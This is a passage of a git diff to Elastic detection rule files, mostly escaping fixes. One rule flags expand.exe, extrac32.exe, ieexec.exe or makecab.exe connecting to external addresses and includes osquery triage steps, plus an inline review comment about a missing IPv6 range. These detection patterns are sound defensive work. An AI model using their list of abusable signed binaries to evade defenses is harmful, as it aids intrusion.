(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
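Review bot: The `not cidrmatch(destination.ip, …)` exclusion in the `query` on the new side enumerates the IPv4 special-purpose ranges but for IPv6 lists only `::1`, `FE80::/10` and `FF00::/8`; unique local addresses (`fc00::/7`, the IPv6 counterpart of the RFC 1918 ranges) are absent, so in a dual-stack environment that uses ULA internally a connection from one of the listed utilities to an internal host is still treated as external and alerts. Adding `"fc00::/7"` to the list would keep the query aligned with the "external address" intent stated in the `note`, and the single `references` entry cites only the IPv4 special-purpose registry, which is consistent with the gap having been overlooked rather than intended. The same query text appears unchanged in the `63e65ec3-…_105.json` hunk below and in the partial hunk at the top of this chunk. The rule object continues outside the hunk on both ends.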
diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_105.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_105.json
index 1c50f64b5bf..363eec88bbe 100644
--- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_105.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Signed Binary", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_106.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_106.json
index 6d8ecc056a5..4454d162854 100644
--- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_106.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Signed Binary", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_102.json b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_102.json index 8350086c23b..3d750287548 100644 --- a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_102.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_103.json b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_103.json
index eb8d07a8e89..eda1a432be6 100644
--- a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_103.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_104.json b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_104.json
index 3ace9d34522..c23f3044be1 100644
--- a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_104.json
@@ -43,7 +43,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_102.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_102.json
index 0bbaf878a30..c9db28f2bfc 100644
--- a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_102.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_103.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_103.json
index 2d24afc4de2..81452a752e4 100644
--- a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_103.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
